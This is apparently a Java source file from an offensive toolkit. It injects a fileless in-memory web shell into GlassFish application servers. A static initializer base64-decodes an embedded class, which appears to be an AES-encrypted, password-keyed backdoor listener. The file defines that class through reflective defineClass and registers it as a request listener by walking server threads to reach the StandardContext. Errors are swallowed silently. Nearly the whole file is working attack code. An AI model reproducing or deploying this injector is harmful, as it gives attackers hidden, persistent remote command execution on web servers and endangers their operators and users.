package core.memshell;

import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.EventListener;
import java.util.List;

public class GlassFishListenerMemShell {
    static {
        Inject();
    }

    public GlassFishListenerMemShell() {
        Inject();
    }

    public static synchronized void Inject() {
        try {
            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
            String ListenerBase64 = "yv66vgAAADMBaAoAYwC9CQBMAL4JAEwAvwgAwAkATADBCADCCQBMAMMIAMQJAEwAxQcAxgoACgC9CgAKAMcKAAoAyAoATADJCQBMAMoIAMsJAEwAzAoAYwDNCgBjAM4IAM8KANAA0QcA0goAMQDTCgAWANQKANAA1QoA0ADWBwDXCADYCgDZANoKADEA2woA2QDcBwDdCgDZAN4KACAA3woAIADgCgAxAOEIAOIKAC4A4wgA5AcA5QoALgDmBwDnCgDoAOkKADAA6ggA6wcA7AcAfAcA7QcA7ggA7woALgDwCADxCADyCADzCAD0CAD1CgAuAPYHAPcKAC4A+AoAOgD5CgD6APsKAPoA/AoA/QD+BwD/CgBMAQAIAQELAEABAggBAwoAMQEECwBAAQULAEABBgoATAEHCgBMAQgIAQkLAQoBCwcBDAoALgENCgBMAM0KAEwBDgsBCgEPCAEQCwBAAQ8HAREKAFMAvQoAMAESCwBhARMKADEBFAoBFQEWCgAwAMgKAFMBFwoATAEYCgAxARkIARoIARsKABsBHAgAZwcBHQgAZQcBHgcBHwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAJ4YwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA1B3ZAEABHBhdGgBAANtZDUBAAJjcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAdTG1lbXNoZWxsL0dsYXNzTGlzdGVuZXJTaGVsbDsBABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEAAXoBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAAVEBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAAJjYgEAAltCAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQAEdmFyNAEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAAXMBAAFtAQABWgEADVN0YWNrTWFwVGFibGUHAQwHASAHANcBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAHUxqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3Q7AQADcmV0BwDuAQAMYmFzZTY0RW5jb2RlAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAB0VuY29kZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAZiYXNlNjQBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjYBAAJicwEABXZhbHVlAQAKRXhjZXB0aW9ucwEADGJhc2U2NERlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAAdkZWNvZGVyAQAFZ2V0RlYBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwEABHZhcjUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAAW8BAAFmAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABWNsYXp6BwEhBwDsBwD3AQAQcmVxdWVzdERlc3Ryb3llZAEAJihMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdEV2ZW50OylWAQADcmVxAQAjTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3RFdmVudDsBABJyZXF1ZXN0SW5pdGlhbGl6ZWQBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQAHc2Vzc2lvbgEAIExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAEZGF0YQEABHZhcjkHASIHAP8HAR0HASMBABZnZXRSZXNwb25zZUZyb21SZXF1ZXN0AQBRKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OylMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAEdmFyMwEABHZhcjgBAAR2YXIxAQAEdmFyMgEAClNvdXJjZUZpbGUBABdHbGFzc0xpc3RlbmVyU2hlbGwuamF2YQwAbwBwDABlAGYMAGcAaAEAEDNjNmUwYjhhOWMxNTIyNGEMAGkAagEABHBBUzMMAGsAagEAEC9mYXZpY29uZGVtby5pY28MAGwAagEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDAEkASUMASYBJwwAbQCKDABtAGoBAAVVVEYtOAwAbgBqDABvAHYMASgBKQEAA0FFUwcBIAwBKgErAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwBLAEtDABvAS4MAS8BMAwBMQEyAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAA01ENQcBMwwBKgE0DAE1ATYMATcBOAEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAE5AS0MAG8BOgwBJgE7DAE8AScBABBqYXZhLnV0aWwuQmFzZTY0DAE9AT4BAApnZXRFbmNvZGVyAQASW0xqYXZhL2xhbmcvQ2xhc3M7DAE/AUABABNbTGphdmEvbGFuZy9PYmplY3Q7BwFBDAFCAUMMAUQBRQEADmVuY29kZVRvU3RyaW5nAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAFGAUcBAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgwBSAFJAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFKAUUMAG8BSwcBIQwBTAFNDAFOAU8HASIMAVABUQEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QMALUAtgEAEFgtUmVxdWVzdGVkLVdpdGgMAVIAigEADlhNTEhUVFBSZXF1ZXN0DAFTAVQMAVUBVgwBVwCKDACYAJkMAH0AfgEAEG1lbXNoZWxsLnBheWxvYWQHASMMAVgBWQEAG21lbXNoZWxsL0dsYXNzTGlzdGVuZXJTaGVsbAwBWgFbDAB5AHoMAVwBXQEACnBhcmFtZXRlcnMBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBXgFfDAFgAWEMAWIBYwcBZAwBZQFLDAFmAS0MAI4AjwwBYgE7AQAOWG1sSFRUUFJlcXVlc3QBAAdTdWNjZXNzDAFnAHABACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAJGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3RMaXN0ZW5lcgEAE2phdmF4L2NyeXB0by9DaXBoZXIBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEAIWphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3RFdmVudAEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAtkZWZpbmVDbGFzcwEAFyhbQklJKUxqYXZhL2xhbmcvQ2xhc3M7AQALZ2V0SW5zdGFuY2UBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEACGdldEJ5dGVzAQAEKClbQgEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQAHZG9GaW5hbAEABihbQilbQgEAG2phdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdAEAMShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAAZsZW5ndGgBAAMoKUkBAAZ1cGRhdGUBAAcoW0JJSSlWAQAGZGlnZXN0AQAGKElbQilWAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9VcHBlckNhc2UBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADWdldFN1cGVyY2xhc3MBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARZ2V0U2VydmxldFJlcXVlc3QBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEACWdldEhlYWRlcgEAB2luZGV4T2YBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkBAApnZXRTZXNzaW9uAQAiKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEADGdldFBhcmFtZXRlcgEADGdldEF0dHJpYnV0ZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAMc2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0OylWAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQALdG9CeXRlQXJyYXkBAA9wcmludFN0YWNrVHJhY2UAIQBMAGMAAQBkAAcAAQBlAGYAAAABAGcAaAAAAAAAaQBqAAAAAQBrAGoAAAABAGwAagAAAAAAbQBqAAAAAQBuAGoAAAALAAEAbwBwAAEAcQAAAJAAAwABAAAARiq3AAEqAbUAAioBtQADKhIEtQAFKhIGtQAHKhIItQAJKrsAClm3AAsqtAAHtgAMKrQABbYADLYADbgADrUADyoSELUAEbEAAAACAHIAAAAmAAkAAAAZAAQA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";
            byte[] ListenerClass = base64Decode(ListenerBase64);

            Method defineClass1 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            defineClass1.setAccessible(true);
            Class listenerClass = (Class) defineClass1.invoke(classLoader, ListenerClass, 0, ListenerClass.length);

            EventListener listenerObject = (EventListener) listenerClass.newInstance();

            ThreadGroup threadGroup = Thread.currentThread().getThreadGroup();
            Field f1 = threadGroup.getClass().getDeclaredField("threads");
            f1.setAccessible(true);
            Thread[] threads = (Thread[]) f1.get(threadGroup);

            for (Thread thread : threads) {
                try {
                    char[] chararray = (char[]) getFV(thread, "name");
                    String chars = String.valueOf(chararray);

                    if (chars.contains("ContainerBackgroundProcessor") && chars.matches(".*StandardContext\\[/.+\\]")) {
                        Object target = getFV(thread, "target");
                        Object this0 = getFV(target, "this$0");

                        Method m2 = this0.getClass().getSuperclass().getSuperclass().getDeclaredMethod("getApplicationEventListeners");
                        m2.setAccessible(true);
                        List<EventListener> eventlisteners = (List<EventListener>) m2.invoke(this0);
                        eventlisteners.add(listenerObject);
                    }
                } catch (Exception e) {
                }
            }
        } catch (Exception e) {

        }
    }

    private static synchronized Object getFV(Object var0, String var1) throws Exception {
        Field var2 = null;
        Class var3 = var0.getClass();

        while (var3 != Object.class) {
            try {
                var2 = var3.getDeclaredField(var1);
                break;
            } catch (NoSuchFieldException var5) {
                var3 = var3.getSuperclass();
            }
        }

        if (var2 == null) {
            throw new NoSuchFieldException(var1);
        } else {
            var2.setAccessible(true);
            return var2.get(var0);
        }
    }

    public static byte[] base64Decode(String bs) throws Exception {
        byte[] value = null;

        Class base64;
        try {
            base64 = Class.forName("java.util.Base64");
            Object decoder = base64.getMethod("getDecoder", (Class[]) null).invoke(base64, (Object[]) null);
            value = (byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, bs));
        } catch (Exception var6) {
            try {
                base64 = Class.forName("sun.misc.BASE64Decoder");
                Object decoder = base64.newInstance();
                value = (byte[]) ((byte[]) decoder.getClass().getMethod("decodeBuffer", String.class).invoke(decoder, bs));
            } catch (Exception var5) {
            }
        }

        return value;
    }
}
